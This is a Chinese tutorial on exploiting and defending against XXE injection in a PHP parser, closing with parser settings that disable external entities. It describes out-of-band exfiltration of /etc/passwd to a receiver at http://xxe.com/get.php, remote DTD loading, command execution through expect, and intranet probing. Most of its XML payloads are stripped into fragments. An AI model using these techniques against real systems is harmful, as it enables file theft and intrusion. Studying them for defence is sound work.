【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习

前言

XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进行处理时引发的安全问题.
在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题。

漏洞利用

当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

测试代码

使用simplexml_load_string函数解析body

name;
?>

漏洞测试

漏洞测试方式1

有回显,直接读取文件

Payload:

 

]>

&xxe;

【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习_第1张图片

漏洞测试方式2

无回显,引用远程服务器上的XML文件读取文件

Payload:



%remote;]>

将以下1.xml保存到WEB服务器下
1.xml

 
"> %b; %c

【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习_第2张图片

查看服务器access.log,可以看到访问日志

漏洞测试方式3

在主机上放一个接收文件的php(get.php):

1.xml内容:



">

%int;

%trick;

这个XML,他引用了外部实体etc/passwd作为payload的值,然后又将payload拼接到http://xxe.com/get.php?xxe_local=%payload;,进行HTTP请求。

接收到请求的get.php就将这个文件内容保存到01.txt了,形成了一个文件读取的过程。

发包过去后,就会请求1.xml,解析这个xml造成XXE攻击,读取etc/passwd并进行base64编码后传给get.php,最后保存到主机上

【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习_第3张图片

查看服务器access.log,可以看到访问日志

查看01.txt

base64解码

【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习_第4张图片

【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习_第5张图片

 

上图是默认支持协议,还可以支持其他,如PHP支持的扩展协议有

【XXE技巧拓展】————4、XML实体注入漏洞的利用与学习_第6张图片

XXE 危害

  • 读取任意文件
  • 执行系统命令
  • 探查内网端口
  • 攻击内网网站

读取任意文件

 

]>

&xxe;

执行系统命令

在安装expect扩展的PHP环境里执行系统命令,其他协议也有可能可以执行系统命令

 

]>

&xxe;

探测内网端口

 

]>

&xxe;

攻击内网网站

结合其他的漏洞比如:struts2

 

]>

&xxe;

防御XXE攻击

方案一、使用开发语言提供的禁用外部实体的方法

PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方案二、过滤用户提交的XML数据

关键词:

 

你可能感兴趣的:(【渗透测试拓展】,———XXE技巧拓展)